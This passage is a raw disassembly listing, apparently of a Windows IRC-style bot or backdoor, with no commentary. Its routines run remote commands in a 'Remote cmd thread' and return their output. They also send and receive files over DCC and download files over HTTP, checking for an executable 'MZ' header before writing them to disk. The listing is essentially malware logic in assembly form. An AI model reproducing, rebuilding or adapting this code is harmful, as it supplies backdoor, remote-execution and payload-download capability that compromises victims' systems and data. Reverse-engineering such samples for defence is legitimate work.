loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push dword_41DE24
call ds:dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push dword_41DE20
call ds:dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call ds:dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call ds:dword_41724C ; htonl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv ds:flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call ds:dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call ds:dword_417244 ; inet_addr
push eax
call ds:dword_41724C ; htonl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv ds:flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call ds:dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
